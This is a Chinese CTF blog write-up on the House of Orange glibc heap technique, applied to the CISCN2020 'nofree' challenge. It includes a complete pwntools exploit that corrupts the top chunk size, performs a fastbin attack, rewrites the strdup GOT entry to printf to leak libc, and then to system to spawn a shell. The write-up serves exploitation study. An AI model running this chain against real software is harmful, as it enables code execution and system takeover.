【八芒星计划】 House of Orange

最新推荐文章于 2022-03-31 00:21:52 发布
最新推荐文章于 2022-03-31 00:21:52 发布
阅读量365 收藏 1
点赞数
分类专栏: CTF PWN
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/108367870
版权
CTF 同时被 2 个专栏收录
27 篇文章 3 订阅
订阅专栏
PWN
24 篇文章 1 订阅
订阅专栏

文章目录

前言

House of Orange是一种用来应对heap题中没有free的情况的方法,通过把top chunk的size改小,然后申请一个大于topchunk的size的chunk来把旧的top chunk放入bin中(可以是fastbin,也可以是unsortedbin)

使用条件有:
①可以修改topchunk的size
②伪造的 size 必须要对齐到内存页
③size 要大于 MINSIZE(0x10)
④size 要小于之后申请的 chunk size + MINSIZE(0x10)
⑤size 的 prev inuse 位必须为 1
其中第二点要特别注意,这导致了我们修改topchunk的size的时候要注意4k对齐,也就是

假如在覆盖之前 top chunk 的 size 大小是 20fe1,地址是0x602020,通过计算得知
0x602020+0x20fe0=0x623000 是对于 0x1000(4kb)对齐的

所以我们伪造的size加上地址也要4k对齐,一般是0x0fe1、0x1fe1、0x2fe1、0x3fe1、0xfe1

CISCN2020 nofree

本题的条件:
①有add和edit
②可以申请假的size,而实际分配的堆块大小是由content决定的(使用strdup进行分配的内存)
③可以修改got表,没开pie
记一下:got是6开头的,plt是4开头的

add(0, 0x28, 'aa')
edit(0, 'a'*0x18+p64(0xfe1))

这样就完成了topchunk的size的更改

for i in range(24):
    add(0, 0x90, 'a'*0x90)
add(0, 0x90, 'a'*0x30)
add(1, 0x90, 'a'*0x90)

因为本题最大chunk是0x90,所以不断申请chunk,最后把topchunk放入fastbin

在这里插入图片描述

edit(0, 'a'*0x38+p64(0x81)+p64(0x6021c0))
add(0, 0x81, 'a'*0x77)
add(0, 0x81, 'a'*0x77)
edit(0, p64(strdup_got)+p64(0x81))
edit(1, p64(printf_plt))

修改fd为heap_list的地址,然后fastbin attack,然后我们就可以修改chunk1的user data的地址了,我们把它修改为strdup的地址,然后把strdup改成printf,制造格式化字符串漏洞
在这里插入图片描述

add(2, 0x18, '%17$p')
libc_base = int(rc(14), 16) - libc.sym['__libc_start_main'] - 240
info('libc_base', libc_base)
system = libc_base + libc.sym['system']
edit(1, p64(system))
add(2, 0x18, 'sh')

泄漏libc,然后再把strdup改成system,getshell

完整exp:

from pwn import *
from LibcSearcher import * 

local_file  = './pwn'
local_libc  = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'
remote_libc = '/root/glibc-all-in-one/libs/2.23/libc-2.23.so'

select = 0

if select == 0:
    r = process(local_file)
    libc = ELF(local_libc)
else:
    r = remote('', )
    libc = ELF(remote_libc)

elf = ELF(local_file)

context.log_level = 'debug'
context.arch = elf.arch

se      = lambda data               :r.send(data) 
sa      = lambda delim,data         :r.sendafter(delim, data)
sl      = lambda data               :r.sendline(data)
sla     = lambda delim,data         :r.sendlineafter(delim, data)
sea     = lambda delim,data         :r.sendafter(delim, data)
rc      = lambda numb=4096          :r.recv(numb)
rl      = lambda                    :r.recvline()
ru      = lambda delims 			:r.recvuntil(delims)
uu32    = lambda data               :u32(data.ljust(4, '\0'))
uu64    = lambda data               :u64(data.ljust(8, '\0'))
info    = lambda tag, addr        :r.info(tag + ': {:#x}'.format(addr))
o_g = [0x45216,0x4526a,0xf02a4,0xf1147]
def debug(cmd=''):
     gdb.attach(r,cmd)

def menu(choice):
    sea('choice>> ', str(choice))
def add(index, size, content):
    menu(1)
    sea('idx: ', str(index))
    sea('size: ', str(size))
    sea('content: ', content)
def edit(index, content):
    menu(2)
    sea('idx: ', str(index))
    sea('content: ', content)
printf_plt = 0x400700
strdup_got = 0x602068
add(0, 0x28, 'aa')
edit(0, 'a'*0x18+p64(0xfe1))
for i in range(24):
    add(0, 0x90, 'a'*0x90)
add(0, 0x90, 'a'*0x30)
add(1, 0x90, 'a'*0x90)
edit(0, 'a'*0x38+p64(0x81)+p64(0x6021c0))
add(0, 0x81, 'a'*0x77)
add(0, 0x81, 'a'*0x77)
edit(0, p64(strdup_got)+p64(0x81))
edit(1, p64(printf_plt))
add(2, 0x18, '%17$p')
libc_base = int(rc(14), 16) - libc.sym['__libc_start_main'] - 240
info('libc_base', libc_base)
system = libc_base + libc.sym['system']
edit(1, p64(system))
add(2, 0x18, 'sh')
r.interactive()

总结

真岛忍
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
houseoforange_hitcon_2016(House of orange, unsorted bin attack,FSOP)
weixin_44145820的博客
04-27 1398
目录题目分析漏洞利用Exp 题目分析 只有添加,显示,编辑三个功能,没有删除 添加函数,最多只能添加四次,每次添加会依次执行malloc(0x10),malloc(name_size),calloc(8) House结构体如下 在编辑函数中,可以进行堆溢出,因为House没有把name的size保存下来 编辑次数最多为3 漏洞利用 Exp ...
house of orange
inquisiter
01-20 410
house of orange 本次笔记基于看雪 看雪CTF.TSRC 2018 团队赛 第十四题 这个东西好像在新版的libc.so中不太好用,不过有点意思记录下吧。 house of orange 1.分配一个堆块 2.溢出topchunk修改size 3.申请超出size的堆,topchunk进入unsorted bin。 4.申请小于size的堆,old_top分为两块。 5. p...
House Of Orange
qq_45595732的博客
11-26 998
House Of Orange 本质:Unsorted bin attack 和 FSOP造成的组合漏洞利用方式。 House of orange源于一道题目,有时候只用到free top chunk的题目也会被归入该类中。 glibc版本<=2.23情况 特点:不需要free操作 核心原理: 1,获取unsorted bin ​ 在_int_malloc函数中,会依次检验 fastbin、small bins、unsorted bin、large bins 是否可以满足分配要求,因为尺寸问
House of orange
seaaseesa的博客
02-14 1671
House of orange因一道同名的题而来,它是在程序没有调用free函数的情况下利用其它漏洞结合IO_FILE来达到利用。 首先利用漏洞修改top chunk的size,然后申请一个比size大的堆,满足一定条件,这个top chunk就会被释放到unsorted bin里。 利用unsorted bin attack,将__IO_list_all指针改写为unsorted bin的头...
16.house_of_orange
06-10 289
源代码 1 #include <stdio.h> 2 #include <stdlib.h> 3 #include <string.h> 4 5 /* 6 The House of Orange uses an overflow in the heap to corrupt the _IO_list_all...
2.27 house of botcake例题附件
最新发布
05-31
2.27 house of botcake例题附件
house of banana .pdf
09-05
house of banana 安全管理 网络信息安全 安全体系 安全实践 信息安全研究
system_of_house_measure.rar_house
09-21
房屋测量系统,集成了基本的地图软件要素。
house-of-leaves
07-04
你知道在House of Leaves 中, house这个词的每个实例都是蓝色的吗? 这是一个简单的 Chrome 扩展程序,可在 Internet 上执行此操作。 不多也不少。
house-of-sock
03-18
问题:在空车上显示的送货价格有问题:已将elif添加到代码中
houseoforange_hitcon_2016
z1r0的博客
03-09 476
houseoforange_hitcon_2016 查看保护 这一题目就是使用house of orange + FSOP来解决 在edit的时候会让用户输入size,这里有一个堆溢出(笔者认为这一题还有一个考点就是逆清楚这个程序,自己增加结构体 这是笔者加的两个结构体,看成这样就行 struct Data{ Info *info; char *name } struct Info{ int price; int color; } 加了这个之后改一下堆块的类型就可以更快的清楚这个程序的结构。 回归
the house of orange解析
小强的博客
11-24 2203
先以这个最简单的例子举例: https://github.com/shellphish/how2heap/blob/master/house_of_orange.c 编译生成ELF文件(64位) p1 = malloc(0x400-16); 每次创建堆都是从top chunk上切割堆块,由于top chunk默认是0x21000,因为我们已经申请了0x400大小的堆,所以此时to
堆溢出-House of orange 学习笔记(看雪论坛)
happylzs2008的专栏
01-07 866
https://www.jianshu.com/p/4b0a73f321f9 前几天把House of orange重新学习了一下,比照着glibc malloc的源码好好分析了一下,希望做到真正做到知其然亦知其所以然,其中所做的笔记如下,可能描述上有点乱,大家将就着看一下吧。同时,我也发在了我个人博客上面 (http://blog.leanote.com/simp1e), 如果有错误的地方,...
攻防世界 进阶 houseoforange
yongbaoii的博客
03-12 640
就是house of orange 跟题目名字一摸一样。 保护 绿油油 build 备注一写顿时简单了起来。 结构分析一下。 那orange的颜色要么就是56746,要么就是0到6. see 然后呢这里56746跟30到36输出是不一样的。 upgrade 房子只能申请三个,改也只能改三次。 对修改的大小没有限制,所以就会有堆溢出。 那问题来了,怎么利用? 他没有free函数,这就是标准的house of orange 我们总体的思路是这样的。 创建第一个house,修改top_chunk的siz
Hitcon CTF 2016 - house of orange 做题笔记
fa1c4的blog
03-31 1001
前言 深入学习pwn的高级堆利用方法, house of orange是绕不开的难关 之前已经接触了house系列题目, 不过由于心理压迫感, 所以迟迟没有开始调试house的漏洞 现在避无可避了, 于是准备集中精力突破掉house of orange 想要打过BOSS得先升级, 但是为了升级必须先打过BOSS (雾~ 分析过程 CTFhub和BUUCTF的题目有差别, 就按BUU来打吧 漏洞利用 总结 参考 ...
house of orange学习报告
qq_35467337的博客
03-08 801
house of orangehouse of orange 不是什么梗,而是一道题目的名字,记录下hitcon 2016ctf house of orange
cscctf_2019_final_childrenheap(house of orange)
seaaseesa的博客
04-30 642
cscctf_2019_final_childrenheap 首先,检查一下程序的保护机制 然后用IDA分析一下 Update功能存在一个null off by one 禁用了fastbin,因此不能fastbin attack。那么可以利用house of orange或者large bin attack,个人认为house of orange较为简单一些。 利用null ...
PWN技巧之_IO_FILE结构体利用house of orange
aptx4869_li的博客
02-16 1012
PWN技巧之_IO_FILE结构体利用house of orange
house_data = raw_house
06-11
`house_data = raw_house` 是将 pandas DataFrame 对象 `raw_house` 复制给 `house_data` 的一个操作。这个操作并没有创建一个新的 DataFrame 对象,而是将 `house_data` 这个变量指向了 `raw_house` 这个 DataFrame...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值